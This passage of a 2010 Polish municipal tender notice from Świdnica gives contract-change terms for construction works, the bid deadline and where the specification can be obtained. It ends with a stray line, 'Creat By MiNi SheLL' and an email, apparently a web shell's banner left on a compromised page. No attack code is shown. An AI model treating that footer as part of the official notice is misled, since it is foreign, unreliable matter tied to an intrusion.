- zawieszenia robót przez Zamawiającego,
- szczególnie niesprzyjających warunków atmosferycznych,
- zmian dokumentacji projektowej, dokonanych na wniosek Zamawiającego lub zaakceptowanych przez Zamawiającego.

d/ Wykonawca może dokonać zmian osób, pełniących funkcje kierownicze na budowie z zachowaniem właściwych kwalifikacji zawodowych.

e/ Zamawiający może dokonać zmiany wynagrodzenia Wykonawcy w przypadku:
- wystąpienia robót w ilościach niezgodnych z ilościami wyliczonymi w przedmiarze robót:
  ; zamówienie uzupełniające udzielone zostanie w przypadku wystąpienia konieczności wykonania większej ilości robót od ilości określonej przedmiarem - zgodnie z art.67 ust.1 punkt 6) ustawy pzp,
  ; w przypadku wykonania mniejszej ilości robót od ilości określonej przedmiarem - Zamawiający zapłaci za ilości faktycznie wykonane,
- wystąpienia robót dodatkowych nieprzewidzianych w przedmiarze robót, w specyfikacji technicznej wykonania i odbioru robót i projekcie, których realizacja warunkuje prawidłowe wykonanie przedmiotu umowy - udzielając zamówienia na roboty dodatkowe zgodnie z art.67 ust.1 punkt 5) ustawy pzp.
Podstawę zmiany wynagrodzenia będzie stanowić kalkulacja Wykonawcy pozytywnie zweryfikowana przez inspektora nadzoru oraz Zamawiającego, sporządzona z zastosowaniem cen i parametrów kosztorysowych podanych w ofercie Wykonawcy dla robót dodatkowych.

3. Zmiany w umowie mogą być dopuszczone wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2010 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com